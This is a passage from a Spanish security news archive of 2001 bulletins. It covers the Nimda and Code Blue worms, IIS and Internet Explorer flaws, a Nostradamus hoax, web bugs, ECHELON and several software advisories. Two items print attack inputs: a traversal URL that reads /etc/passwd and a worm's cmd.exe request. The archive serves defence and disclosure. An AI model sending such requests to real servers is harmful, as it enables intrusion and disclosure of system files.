HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden

La infección continúa infectando archivos .EXE, anteponiendo su
código, con la excepción del archivo Winzip.exe al que no infecta.

Aunque es posible intentar la limpieza manual, a base de restaurar las
claves del registro, eliminar archivos infectados o instalar de nuevo
los modificados, son tantos pasos los que hay que dar que, para no
eternizar esta noticia y evitar descuidos, aconsejamos el uso de las
utilidades que los antivirus están facilitando para realizar la
desinfección de manera automática.

Así se propaga...

Nos queda por comentar básicamente dos rutinas importantes de Nimda
para cerrar el círculo que iniciamos al explicar las formas en las
que podía llegar.

La primera es la propagación a través del correo electrónico. Las
direcciones de las víctimas las recolecta de archivos con extensión
.HTM y .HTML, o accediendo a los buzones de correo a través de MAPI.
El mensaje que envía en formato HTML explota la vulnerabilidad que
comentamos al principio de la noticia para intentar autoejecutar el
archivo adjunto "readme.exe" nada más ser previsualizado con Outlook
y Outlook Express. Para el envío Nimda cuenta con su propia rutina
SMTP.

La segunda es la búsqueda de servidores Webs, que lleva a cabo
lanzando peticiones GET que intentan explotar vulnerabilidades del
Internet Information Server contra direcciones IP al azar. Además de
infectar servidores Web, este proceso conlleva un continuo tráfico
que, como efecto secundario, puede degradar las comunicaciones en
Internet.

Por último indicar que en el código del virus aparece la siguiente
cadena a modo de firma:

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China



Bernardo Quintero
bernardo@hispasec.com



miércoles, 19 de septiembre de 2001

W32/Nimda, más vale prevenir que curar

Nimda es capaz de infectar sistemas Windows, tanto clientes cómo
servidores, y aprovecha vulnerabilidades en los productos de
Microsoft para hacerlo de forma automática, sin necesidad de
intervención por parte del usuario. En esta entrega haremos especial
hincapié en la prevención, ya que algunos medios y casas antivirus
están proporcionando métodos y enlaces que pueden provocar la
reaparición de antiguos agujeros de seguridad.
Cada vez son más los gusanos que aprovechan vulnerabilidades en el
software y utilizan auténticas técnicas de "hacking" para propagarse
de forma automática, sin necesidad de que el usuario tenga que abrir
o ejecutar un archivo. Una vez más insistimos en la importancia de
mantener los sistemas puntual y correctamente actualizados.

En el caso concreto de Nimda los afectados, cómo suele ser habitual,
son productos de Microsoft, pero esta vez por partida doble.

Clientes Win9x/NT/2000/ME (Internet Explorer y Outlook/Outlook Express)

En clientes Windows, Nimda explota una vulnerabilidad de Internet
Explorer a través de la cual es posible forzar la ejecución automática
de un binario adjunto en un mensaje de correo (.EML). Para lograrlo
modifica la cabecera MIME que hace referencia al archivo de forma que
simula ser un formato confiable, en el caso que nos ocupa un archivo
de audio. Esto provoca que Internet Explorer lo abra sin preguntar al
usuario. Esta vulnerabilidad es heredada por los clientes de correo
Outlook y Oulook Express, ya que utilizan el componente de Internet
Explorer para visualizar los mensajes HTML.

En definitiva, la visualización de una página web, o la simple
recepción y previsualización de un mensaje de correo HTML, puede
provocar la ejecución de un archivo sin la intervención del usuario,
en el caso que nos ocupa el archivo "readme.exe".

Esta vulnerabilidad fue descubierta en marzo de 2001 por nuestro
colega Juan Carlos García Cuartango, si me permiten la cuña
publicitaria, uno de los creadores y docentes del curso Seguridad
Internet en Windows 2000 (http://www.hispasec.com/formacion/intro.htm)

Microsoft facilitó el correspondiente parche el 29 de marzo de 2001,
que deberían aplicar los usuarios de Internet Explorer 5.01 y 5.5,
disponible en:
http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp

En vez de esta actualización, recomendamos instalar un segundo parche
distribuido el 16 de mayo de 2001 que corrige la vulnerabilidad
comentada junto a otros problemas posteriores, disponibles según
versión en:

Internet Explorer 5.01
http://www.microsoft.com/windows/ie/download/critical/q295106/default.asp

Internet Explorer 5.5
http://www.microsoft.com/windows/ie/download/critical/q299618/default.asp

Es importante instalar la última actualización acumulativa disponible,
o Service Pack (según configuración), para evitar que reaparezcan
antiguas vulnerabilidades al instalar parches anteriores.

Servidores Web NT/2000 (Internet Information Server)

En servidores Windows, Nimda explota una vulnerabilidad que Microsoft
denominó "Web Server Folder Traversal", que permite ejecutar archivos
en el servidor a través de una URL especialmente formada en
codificación Unicode.

El gusano aprovecha esta vulnerabilidad para ejecutar una sesión de
TFTP y descargar en el servidor web el archivo ADMIN.DLL, y así
infectarlo de forma que rastrea IPs en busca de otros servidores
web que poder infectar. Asimismo, busca y modifica los archivos con
nombre DEFAULT, INDEX, MAIN o README y extensión HTM, HTML o ASP
para incluir código JavaScript. De esta forma incluye el código que
explota la vulnerabilidad del Internet Explorer, comentada al
principio, con lo que provoca la infección de clientes que visiten
sus páginas web.

Microsoft facilitó una actualización de seguridad para esta
vulnerabilidad en octubre de 2000, disponible en la dirección:

http://www.microsoft.com/technet/security/bulletin/ms00-078.asp

Las actualizaciones, según versión del Internet Information Server:

Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

Sin embargo, de nuevo no recomendamos utilizar estas actualizaciones
que se están difundiendo en la mayoría de los avisos, en su lugar
debería instalarse la última actualización acumulativa del 17 de
agosto de 2001:

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Según versión:

IIS 4.0
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32061

IIS 5.0
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011

Es muy importante guardar el orden al parchear (Service Packs,
acumulativos y específicos), evitando instalar actualizaciones
posteriores que pueden generar la reaparición de vulnerabilidades
ya corregidas con anterioridad.

En la próxima entrega nos centraremos en el análisis del virus y
procedimientos para su eliminación.

Más información:

Virus I-Worm.Nimda - Un poco de todo
http://www.avp-es.com/virus/nimda.html

"Nimda" Worm A High Risk Threat
http://www3.ca.com/Press/PressRelease.asp?id=1762

Nimda
http://www.f-secure.com/v-descs/nimda.shtml

W32/Nimda@MM
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

Nimda
http://service.pandasoftware.es/enciclopedia/ficha.jsp?Virus=Nimda

W32.Nimda.A@mm
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html

Nimda worm hits net
http://www.securityfocus.com/templates/article.html?id=253

W32/Nimda
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

TROJ_NIMDA.A
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A




Bernardo Quintero
bernardo@hispasec.com



martes, 18 de septiembre de 2001

Alerta: Gusano de gran propagación (W32/Nimda)

Llega adjunto en un mensaje con el nombre de archivo "readme.exe", o
intenta descargarse al visitar la página web de un servidor infectado.
En estas primeras horas ya se contabilizan por miles las infecciones
en todo el mundo.
Cómo medida preventiva, los usuarios deben borrar cualquier mensaje
que llegue con un archivo adjunto con el nombre de "readme.exe". Si al
entrar en una página web aparece un cuadro de diálogo donde pregunta
si deseamos abrir o guardar un archivo, debemos elegir la opción cancelar.

Su enorme capacidad de propagación se debe a que infecta y se difunde
aprovechando tanto las infecciones entre clientes (módulo readme.exe)
cómo a través de servidores Web basados en Internet Information Server
(módulo Admin.dll). Entre otras características también destaca la
compartición de la unidad C: en los sistemas infectados. A grandes
rasgos, podríamos hablar de una suma entre SirCam y CodeRed.

En estos momentos nos encontramos analizando el espécimen, gracias a
muestras que nos han llegado directamente a nuestros buzones y las
remitidas por Oscar Conesa, de EsCERT-UPC, junto a un análisis
preliminar.

En las próximas horas emitiremos un análisis más completo, hasta
entonces solicitamos a los usuarios que extremen las precauciones
en la recepción de archivos adjuntos a través de e-mail y en las
descargas automáticas vía Web.

Los administradores de servidores con Internet Information Server
deberán comprobar que no se encuentran infectados, hecho que sólo
sucederá en sitios webs no actualizados, ya que el gusano explota
una antigua vulnerabilidad basada en la escalada de directorios
con caracteres Unicode.



Bernardo Quintero
bernardo@hispasec.com



lunes, 17 de septiembre de 2001

Nuevas convocatorias del curso práctico de Seguridad Internet

El curso "Seguridad Internet en servidores Windows 2000", organizado
por Hispasec Sistemas y el Instituto para la Seguridad en Internet
(ISI), amplía el número de grupos para dar cabida a la demanda. Ya
están disponibles siete nuevos grupos de este curso, especializado y
muy práctico, que se impartirá en Madrid.
Nuevos grupos:

25 al 28 de septiembre
02 al 05 de octubre
16 al 19 de octubre
23 al 26 de octubre
05 al 08 de noviembre
19 al 22 de noviembre
10 al 13 de diciembre

"Seguridad Internet en servidores Windows 2000" es un curso
especializado y muy práctico. Los asistentes, que contarán con un
ordenador por persona, documentación en español y CD-ROM con todas las
utilidades vistas en el curso, realizarán ataques reales contra
Internet con las mismas herramientas utilizadas por los intrusos
(hackers). Cada aspecto se plantea inicialmente desde la perspectiva
del intruso. Una vez comprendido, se mostrará su posible solución y,
lo que es más importante, las medidas preventivas que se deben
adoptar para evitar un ataque.

El programa del curso lo pueden encontrar en la siguiente dirección,
junto con información general y el formulario de inscripción:

http://www.hispasec.com/formacion/programa.htm



Bernardo Quintero
bernardo@hispasec.com


Más información:

19/06/2001 - Ampliación del curso de seguridad Internet
http://www.hispasec.com/unaaldia.asp?id=968

06/06/2001 - Curso práctico de Seguridad Internet
http://www.hispasec.com/unaaldia.asp?id=955



domingo, 16 de septiembre de 2001

Hoax: Falsa profecía de Nostradamus sobre el ataque a EE.UU.

Una falsa profecía atribuida a Nostradamus, en la que supuestamente
predice el ataque a EE.UU. y el comienzo de la tercera guerra mundial,
está "infectando" estos días importantes medios de comunicación.
Sorprende que reputados periodistas se hayan hecho eco de la cita sin
constatar su veracidad. De primera intención, cuenta con un error
garrafal ya que está datada en 1654, y Nostradamus murió en 1566.
El hoax, del que ya existen diversas versiones, hace referencia a una
predicción de Nostradamus en 1654 donde se anuncia que la tercera
guerra mundial comenzará con la caída de "dos hermanos", imagen que
recuerda a la destrucción de las torres gemelas del World Trade
Center.

Primera versión del hoax:

---
"In the City of God there will be a great thunder, Two brothers torn
apart by Chaos, while the fortress endures, the great leader will
succumb. The third big war will begin when the big city is burning"

Nostradamus 1654

---
"En la Ciudad de Dios habrá un gran trueno. Dos hermanos serán
destrozados (desgarrados) por el Caos, mientras la fortaleza
permanece. El gran líder sucumbirá. La tercera gran guerra comenzará
cuando la gran ciudad arda."

Nostradamus 1654

---

Esta cita, al menos su mayor parte, fue creada por Neil Marshall, un
estudiante canadiense que la publicó en 1998 en su Web como parte de
su estudio "Nostradamus: A Critical Analysis". Marshall quiso
demostrar lo fácil que resultaba crear profecías tan abstractas y
vagas que pudieran dar cabida a cualquier tipo de interpretación.

Hasta el 11 de septiembre de 2001 no existía ninguna otra referencia
sobre esta cita. A partir del ataque terrorista, la cita comenzó a
circular por foros y listas de distribución en Internet atribuyéndose
directamente a Nostradamus. Para causar aún mayor impacto, alguien
añadió la última frase, la que hace referencia al comienzo de la
tercera guerra mundial, que no existía en el original de Marshall.

El análisis de Marshall se encontraba accesible en la dirección
(http://www.ed.brocku.ca/~nmarshal/nostradamus.htm). El 13 de
septiembre de 2001, la universidad sustituyó la página Web de Marshall
por la que puede encontrarse actualmente, donde se explica que los
continuos accesos y descargas de la página, a raíz de la distribución
del hoax, estaba consumiendo demasiado ancho de banda y degradando el
servidor Web de la Universidad, por lo que han decidido retirar la
página de Marshall.

Otras versiones del hoax van aún más lejos, incluyendo referencias a
los "pájaros de hierro" o indicando el día y mes del suceso.

---
"on the 11 day of the 9 month that... two metal birds would crash into
two tall statues...in the new city..and the world will end soon after"

"En el día onceno del mes noveno... dos pájaros de metal chocarán contra
dos altas estatuas... en la nueva ciudad... y el mundo terminará poco
después."

- From the book of Nostradamus

---

Nos encontramos ante un nuevo hoax (bulo o falso rumor) que, por la
propagación que está consiguiendo, no tiene nada que envidiar a
ninguno de los gusanos o virus de última generación. De hecho, y una
vez catalogado como hoax, parece ser que los servicios de información
sobre seguridad son los principales encargados de arrojar luz sobre
este tema. Así, nuestro colega José Luis López ya informaba sobre el
bulo en su boletín sobre virus informáticos que mantiene desde
Uruguay, y hasta la CIAC (Computer Incident Advisor Capability),
encargada de los incidentes informáticos para el Departamento de
Energía de los EE.UU. y agencias gubernamentales, ha informado sobre
la falsa profecía.

Algunos forofos de Nostradamus aún seguían insitiendo sobre la
posibilidad de que la cita formara parte de las las sextillas o
sextetas, parte de una pretendida Centuria XI, robada al autor y
publicada tras su muerte en el siglo XVII. Particularmente hemos
realizado una búsqueda de la profecía en toda su obra (gracias a
Internet), incluyendo las sextillas y centurias posteriores a la X,
motivo de discrepancias sobre su autoría entre los estudiosos de
Nostradamus. El resultado es el mismo, no existe tal profecía.

Seguidores de la obra de Nostradamus han confirmado de que se trata de
un bulo, y en su lugar ofrecen más de una decena de profecías
diferentes de Nostradamus que podrían ser interpretadas dando cabida
al ataque de EE.UU. (http://www.dreamscape.com/morgana/91101.htm).
Algo que, lejos de demostrar cualquier tipo de acierto, da la razón
a Marshall en cuanto a la ambigüedad de las profecías.

Cómo muestra de las posibilidades de interpretación que ofrecen las
profecías de Nostradamus, y para dar un toque más informático a esta
noticia, recomiendo la lectura de una interesante interpretación
sobre la predicción de, nada más y nada menos, un bug del Pentium:

The Pentium Bug Prediction...

http://www.ee.duke.edu/~sudeep/pbug.html

Una vez demostrado que la profecía es falsa y no pertenece a
Nostradamus, tan sólo queda esperar que los medios que se hayan hecho
eco sobre ella dediquen, al menos, el mismo tiempo para desmentirla.
No en vano, lo único que puede generar la supuesta profecía es
alarma social.



Bernardo Quintero
bernardo@hispasec.com


Más información:

CIAC - Fake Nostradamus Prophecies
http://hoaxbusters.ciac.org/HBUrbanMyths.shtml#nostradamus

Did Nostradamus Predict the Tragedy?
http://urbanlegends.about.com/library/weekly/aa091101b.htm

List of lies: World Trade Center (Nostradamus)
http://www.liemails.com/indexwo.htm#worldtradecenternostradamus

No-no Nostradamus
http://www.breakthechain.org/exclusives/nostra.html

False Prophecy
http://www.snopes2.com/inboxer/hoaxes/predict.htm

Hoax e-mail claims Nostradamus predicted attack
http://www.usatoday.com/life/cyber/tech/2001/09/13/ebrief.htm

A Predictable "Prediction"
http://www.washingtonpost.com/wp-dyn/articles/A28621-2001Sep14.html

¿Ya estaba escrito?
http://www.ikerjimenez.com/nostradamus.htm



sábado, 15 de septiembre de 2001

La invasión de los Web Bugs

Seguro que en más de una película ha visto esos pequeños micrófonos o
"bugs" para pinchar líneas telefónicas. Se insertan en el propio
micrófono del teléfono y permiten escuchar todas las conversaciones.
Muchas agencias de publicidad especialmente agresivas utilizan
técnicas parecidas para reunir datos demográficos sobre el
internauta. Cuanto más exacto es el perfil compilado, mayor el éxito
cosechado en campañas personalizadas y fuertemente segmentadas. De
ahí la carrera desesperada de las agencias de marketing por hacerse
con información personal de los internautas. Las escuchas web o Web
Bugs representan uno de los últimos recursos éticamente cuestionables
para recopilar datos sobre los visitantes de un sitio web.
Una escucha web es un gráfico GIF transparente dentro de una página
web o dentro de un correo electrónico del mismo color del fondo y con
un tamaño de 1x1 píxeles. Normalmente, al igual que ocurre con las
cookies, son puestas ahí por terceras partes para entresacar
información acerca de los lectores de esas páginas o correos. La
información recabada sobre el visitante gracias a esta imagen incluye
entre otros datos la dirección IP de su ordenador, el URL de la
imagen, que codifica los datos que serán enviados desde la página web
visitada al sitio recolector de información, la fecha y hora en que
fue vista la imagen, el tipo y versión de navegador del internauta,
su sistema operativo, idioma e incluso valores de cookies si es que
no están deshabilitadas.

Dado que la imagen es invisible en la práctica, el confiado usuario
no sospecha que el sitio web donde ha entregado a través de un
formulario datos sobre su persona incluye en sus páginas un GIF
transparente que se carga desde otro sitio web de terceras partes. En
el URL de la imagen se han añadido sus datos personales, que pasarán
a ser conocidos por las terceras partes. Todo ello de forma
silenciosa y sin que el internauta se percate de nada.

Otro uso igualmente intrusivo se presenta cuando se insertan dentro
de correos que utilizan el hoy omnipresente formato HTML. Gracias a
las escuchas web insertadas en los mensajes de correo, el sitio que
los envió puede saber cuánta gente los leyó, con qué frecuencia y si
los reenviaron a alguien. Por supuesto, las compañías que las usan no
advierten de su presencia ni de los fines que persiguen con ellas. A
diferencia de los banners, cuya presencia es manifiesta, las escuchas
web permanecen inadvertidas. Mantienen en secreto su existencia
dentro de las páginas web y de los mensajes de correo. Pero aunque no
pueda verlas, desde las sombras violan su intimidad.




Gonzalo Álvarez Marañón
jgonzalz@diac.upm.es
Boletín Criptonomicón #82
http://www.iec.csic.es/criptonomicon



viernes, 14 de septiembre de 2001

ECHELON ya es oficial

El pasado 5 de Septiembre, la comisión de la unión europea encargada de
determinar la existencia real de la red de espionaje ECHELON, entregó su
informe afirmativo al respecto.
Echelon es una red de espionaje de comunicaciones de EE.UU., con bases
en Estados Unidos, Canadá, Gran Bretaña, Nueva Zelanda y Australia.
Desarrollada inicialmente con fines de espionaje militar, parece haberse
reciclado ahora a una red de espionaje económico e industrial, a juzgar
por las denuncias de diversas compañías europeas, como el consorcio
Airbus.

Tras las denuncias de importantes compañías europeas, testimonios de
ex-operarios de la red y rumores más que fundados, el parlamento europeo
decidió fundar hace un año una comisión para determinar la existencia o
no de Echelon, así como la participación del Reino Unido en dicha red.
En caso afirmativo, las implicaciones políticas son muy amplias, ya que
Gran Bretaña habría contribuido a espionaje del resto de miembros de la
unión europea por parte de potencias extranjeras.

El informe final realiza las siguientes aseveraciones de importancia:

- Echelon existe

- La privacidad es un derecho fundamental

- Se recomienda el uso de comunicaciones cifradas, a todos los niveles.
Se llega incluso a afirmar la conveniencia de desarrollar campañas de
concienciación institucionales, sobre el particular.



Jesús Cea Avión
jcea@hispasec.com


Más información:

EP motion for a resolution on the Echelon interception system
http://europa.eu.int/rapid/start/cgi/guesten.ksh?p_action.gettxt=gt&doc=SPEECH/01/3680RAPID&lg=EN

El Parlamento Europeo demuestra la existencia de "Echelon"
http://www.larazon.es/lared/laredespias.htm

El Parlamento europeo reconoce la existencia de la red de espionaje
Echelon
http://www.idg.es/pcworld/noticia.asp?idn=18239

16-4-1999 - Bruselas estudia cómo pinchar Internet
http://www.hispasec.com/unaaldia.asp?id=171

08-02-2000 - Documentos desclasificados confirman la existencia de
"Echelon"
http://www.hispasec.com/unaaldia.asp?id=469

12/03/2001 - Confirmación de la existencia de Echelon
http://www.hispasec.com/unaaldia.asp?id=869

03/06/2001 - La UE aconseja cifrar el correo electrónico
http://www.hispasec.com/unaaldia.asp?id=952

Francia demandará a EE.UU. y al Reino Unido por la red ECHELON
http://www.argo.es/~jcea/artic/hispasec47.htm

El Parlamento Europeo investiga Echelon
http://www.argo.es/~jcea/artic/hispasec48.htm

La Eurocámara reconoce que Echelon espía a Europa y quiere montar una
red similar
http://www.ciberpais.elpais.es/d/20010913/cibersoc/soc1.htm

Echelon, la red de espionaje falla estrepitosamente ante los ataques a
EE.UU.
http://www.idg.es/pcworld/noticia.asp?idn=18377



jueves, 13 de septiembre de 2001

Denegación de Servicios en Windows NT por servicios RPC

El mapeador de términación para el servicio RPC de Windows NT 4.0
contiene un fallo que hace que este pueda fallar tras recibir una
petición que contenga un tipo particular de datos mal construidos.
El mapeador de terminación para el servicio RPC permite a los clientes
RPC determinar el número de puerto asignado en el momento a un servicio
RPC particular. Como el mapeador de terminación corre dentro del propio
servicio RPC si un atacante logra explotar esta vulnerabilidad podrá
provocar que el referido servicio RPC falle. De aquí, se sigue que la
pérdida de cualquier servicio basado en RPC provocará la consiguiente
pérdida potencial de algunas funciones COM. Cualquier usuario que pueda
enviar datos al puerto 135, puerto en el que corre el mapador, podrá
provocar una denegación de servicios contra el servidor, de forma que
sea necesario reiniciarlo para recuperar su correcto funcionamiento.

Las medidas habituales de seguridad y las reglas del firewall deberían
bloquear todas las peticiones al puerto 135, con lo que evitaría esta
vulnerabilidad de forma remota. Si bien cualquier usuario que pueda
realizar peticiones sobre dicho puerto puede tener acceso a explotar
la vulnerabilidad.

Microsoft publica un parche para cubrir los efectos de esta
vulnerabilidad en:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32503



Antonio Ropero
antonior@hispasec.com


Más información:

Boletín de seguridad de Microsoft (MS01-048):
http://www.microsoft.com/technet/security/bulletin/MS01-048.asp


miércoles, 12 de septiembre de 2001

Desbordamiento de buffer en Iplanet Messaging Server 5.1

Un desbordamiento de buffer en iPlanet Messaging Server 5.1
(versión de evaluación), podría permitir la ejecución de comandos
con el privilegio de administrador en la máquina atacada.
El servidor de mensajería iPlanet está diseñado para proporcionar
servicio SMTP, IMAP4, POP3 y servicios de correo basado en web. Para
la realización de estas acciones el servidor pedirá la información
del usuario registrado. Una vez realizado esto, procederá a enviarlo
al servidor cifrándola previamente en base64. Si una cadena de
caracteres extremadamente larga es incluida en el nombre de usuario,
esto podría causar el desbordamiento del buffer y la ejecución de
comandos en el sistema atacado a nivel de administración.

Esta vulnerabilidad ha sido descubierta y probada por SNS Team, en
Microsoft Windows NT Server 4.0, actualizado con SP6a versión inglesa.



Antonio J. Román Arrebola
roman@hispasec.com


Más información:
iPlanet Messaging Server 5.1 (evaluation copy) Buffer Overflow Vulnerability
http://www.lac.co.jp/security/english/snsadv_e/41_e.html



martes, 11 de septiembre de 2001

Gusano "Code Blue", un sucedáneo de "Code Red"

Diversas organizaciones, como ISS, Kapersky Labs e incidents.org,
informan de la existencia de un nuevo gusano que recuerda en cierta
medida a "Code Red". No obstante, los análisis realizados por ahora
parecen indicar que no tendrá una incidencia tan importante como su
predecesor.
"Code Blue" no es un gusano residente en memoria como "Code Red".
Esto hace que su detección sea mucho más simple. Se distribuye dentro
de un archivo .DLL (biblioteca de enlace dinámico) y lo ejecuta un
archivo .EXE. En lo que sí se parece a "Code Red" es en el método de
propagación, una vez infectado el sistema, "Code Blue" inicia
aproximadamente 100 threads que realizaran la búsqueda de otros
sistemas vulnerables donde se pueda copiar el gusano.

"Code Blue" inicia la búsqueda en las direcciones IP "cercanas" con
el objetivo de reducir las peticiones a direcciones IP no
direccionables. Incluye también una porción de código para evitar la
infección de un sistema ya afectado.

"Code Blue" no parece tener ninguna intención destructiva o malévola.
No borra ningún archivo del sistema ni instala ninguna puerta trasera
(backdoor) en el sistema infectado. Eso si, tiene un notable impacto
en el rendimiento del sistema afectado.

El gusano instala un programa escrito en Visual BASIC Script (d.vbs)
que borra los mapeos de los archivos ".ida", ".idq" y ".printer" para
a continuación borrarse el mismo. Una posible explicación de esta
acción es la de evitar la infección del sistema por parte de "Code
Red" o bien prevenir cualquier otro ataque que utilice la
vulnerabilidad .IDA de Microsoft IIS.

Cada día, entre las 10:00 y las 11:00 GMT, el gusano realizará un
ataque de denegación de servicio (envío masivo de paquetes) contra
una dirección IP específica que corresponde a los sistemas de una
empresa de seguridad de la China.

"Code Blue" utiliza la vulnerabilidad denominada "Web Server Folder
Traversal", para la que Microsoft publicó una actualización el pasado
octubre de 2000. Esta actualización, además, también viene incluida
dentro del Service Pack 2 de Windows 2000 y el Security Rollup
Package (SRP) para Windows NT 4.0. Esto hace prever que la incidencia
de este gusano será bastante pequeña.

"Code Blue" utiliza varias cadenas para el ataque contra los
sistemas, con diferentes caracteres codificados. No obstante, el
método de escaneo si que es uniforme: el gusano envía una petición
HTTP (HEAD) contra el servidor e inspecciona la respuesta. Si el
servidor remoto es un IIS, envía una segunda petición HTTP (GET) en
la que intenta explotar la vulnerabilidad.

Esta segunda petición tiene un aspecto similar al siguiente:

GET / .. [caracteres codificados] ../winnt/system32/cmd.exe?c+dir

Recomendaciones
Si algún administrador de IIS todavía no ha instalado la
actualización necesario, debe seguir estos pasos:

* Instalar la actualización disponible para IIS 4.0 e IIS 5.0:

IIS 4.0
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862

IIS 5.0
http://www.microsoft.com/windows2000/downloads/critical/q269862

Alternativamente puede instalar el parche acumulativo que, además de
esta actualización, incluye otras igualmente importantes:

http://www.microsoft.com/technet/security/bulletin/MS01-044.asp

Eliminación de "Code Blue" de un ordenador infectado

* Con REGEDIT, localizar la clave
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

* Localizar y borrar la entrada correspondiente a C:\SVCHOST.EXE

* Salir de REGEDIT.

* Borrar el archivo C:\SVCHOST.EXE.

* Borrar cualquier copia de D.VBS existente en el sistema.

* Reiniciar el ordenador.



Xavier Caballé
xcaballe@quands.com


Más información:

Aviso de Kapersky Labs
http://www.kapersky.com/news.asp?tnews=0&nvView=1&id=228&page=0

Hispasec 20-10-00: Una grave vulnerabilidad afecta a todos los
servidores IIS
http://www.hispasec.com/unaaldia.asp?id=726

Boletín de de Microsoft: "Microsoft IIS 4.0 / 5.0 Extended UNICODE
Directory Traversal Vulnerability"
http://www.microsoft.com/technet/security/bulletin/ms00-078.asp

Versión original de esta noticia (en catalán)
http://www.quands.com/alertes/html/code-blue.html



lunes, 10 de septiembre de 2001

Vulnerabilidades en TrueSync Desktop 2.0

Un erróneo tratamiento en las contraseñas permitiría a un atacante
poder visualizar las contraseñas almacenadas por TrueSync Desktop 2.0.
TrueSync Desktop es un "Personal Information Manager" (PIM), lo que
puede describirse como una agenda personal que corre sobre el sistema
operativo Windows. Esta aplicación ha sido desarrollada por la firma
Starfish Software con el fin de permitir la sincronización y transmisión
de información entre dispositivos móviles y el ordenador del usuario.

El problema que afecta a TrueSync Desktop 2.0 viene dado por el modo
en que el mencionado software trata las contraseñas. Cuando un usuario
introduce su password con el fin de salvaguardar sus datos, esta es
almacenada con la única "protección" de convertir cada uno de los
caracteres introducidos por su equivalente en código ASCII en el
registro de Windows.

Concretamente la contraseña queda almacenada, ocultada mediante el
mencionado método, en la entrada:

HKEY_LOCAL_MACHINE\SOFTWARE\Starfish\TrueSyncDesktop\Version1\PASSWORD\pswd



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Starfish TrueSync Desktop Password Disclosure Vulnerability
http://www.securityfocus.com/bid/3231

Starfish Truesync Desktop + REX 5000 Pro multiple vulnerabilities
http://www.securityfocus.com/archive/1/210067



domingo, 9 de septiembre de 2001

Lista de direcciones al descubierto en Exchange 5.5

Los servidores de correo Microsoft Exchange 5.5, siempre y cuando
tengan instalada la función Outlook Web Access (OWA), presentan una
vulnerabilidad por la cual un usuario sin autentificar puede listar
los nombres de las cuentas de correo existentes en el servidor.
Una de las características de OWA en Exchange 5.5 es la posibilidad
de buscar en la lista global de direcciones (GAL). Aunque dicha
opción, "Find Users", puede ser desactivada por el administrador,
es posible acceder directamente a la página ASP (fumsg.asp) y
realizar la petición de búsqueda.

La explotación de la vulnerabilidad sólo permite realizar búsquedas
de nombres de cuentas, en ningún momento se puede manipular los
buzones de correo ni enviar, leer o eliminar mensajes. En Microsoft
Exchange 2000 no se ha podido reproducir el problema.

Los servidores afectados por la vulnerabilidad deberán aplicar
el parche distribuido por Microsoft, disponible en la dirección
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32483



Bernardo Quintero
bernardo@hispasec.com


Más información:

OWA Function Allows Unauthenticated User to Enumerate Global Address List
http://www.microsoft.com/technet/security/bulletin/MS01-047.asp



sábado, 8 de septiembre de 2001

Visualización y ejecución arbitraria en Power UP HTML

De nuevo una aplicación no filtra correctamente las peticiones HTTP
y permite escalar directorios en el servidor web a través de la
cadena ../.
Power UP HTML proporciona extensiones al HTML estándar cuyos nuevos
comandos son interpretados por CGIs. La vulnerabilidad comentada
permite escalar directorios fuera de la raíz pública, visualizar
archivos y ejecutar código arbitrario.

Ejemplo:
http://www.target.com/cgi-bin/powerup/r.cgi?FILE=../../../../../etc/passwd

El problema ha sido detectado en la última versión disponible, Power
UP HTML 0.8033beta, y de momento el autor no ha publicado ninguna
corrección. La recomendación para los afectados pasa por desinstalar
la aplicación.



Bernardo Quintero
bernardo@hispasec.com


Más información:

BugTraq
http://www.securityfocus.com/archive/1/212679

Power Up HTML
http://dev.ideacube.com/cgi-bin/powerup/r.cgi?FILE=main.html



viernes, 7 de septiembre de 2001

Vulnerabilidad en fetchmail

Fetchmail se ve afectado por una vulnerabilidad que permite a un
atacante escribir código arbitrario en el sistema del cliente.
Fetchmail es una utilidad de los sistema UNIX, que permite a un
cliente la descarga de correo electrónico de los servidores a través
de POP3 e IMAP.

Para que un atacante pueda explotar esta vulnerabilidad deberá tener
control sobre el servidor de correo y así poder interrogar al proceso
de fetchmail. Una explotación acertada de esta vulnerabilidad puede
conducir a la ejecución de código en el ordenador del cliente

Los usuarios de fetchmail pueden descargar los parche pertinentes
desde las direcciones que a continuación se relacionan. Será
necesario el posterior reinicio de fetchmail siempre que este corra
como demonio.

ftp://atualizacoes.conectiva.com.br



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Fetchmail IMAP Reply Signed Integer Index Vulnerability
http://www.securityfocus.com/bid/3166

Fetchmail POP3 Reply Signed Integer Index Vulnerability
http://www.securityfocus.com/bid/3164

The fetchmail Home Page
http://www.tuxedo.org/~esr/fetchmail



jueves, 6 de septiembre de 2001

Desbordamiento de buffer en in.telnetd

El servidor Telnet "in.telnetd", que forma parte de la distribuciones
de SuSE, se ve afectado por un desbordamiento de buffer.
La vulnerabilidad en cuestión es explotable remotamente mientras se
realiza la opción de negociación Telnet, que puede llegar a permitir
que cualquier usuario remoto provoque un desbordamiento de buffer en
el sistema atacado. Esta información, no afecta únicamente a la
distribución de SuSE, ya que también se ven afectados por este
problema todas las implementaciones del demonio Telnet disponibles
para UNIX, cuyo Telnet esté basado en BSD.

En estos momentos existen parches para los usuarios de las
distribuciones 7.1 y 7.2. El paquete necesario para solucionar este
problema en la distribución 7.1 se denomina "nkitserv" siendo su
denominación "telnet-server" para la 7.2.

Los usuarios afectados pueden bajarse los correspondientes parches de:
ftp://ftp.suse.com/pub/suse



Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Announcement: nkitb/nkitserv/telnetd
http://lists2.suse.com/archive/suse-security-announce/2001-Sep/0000.html

[suse-security] in.telnetd
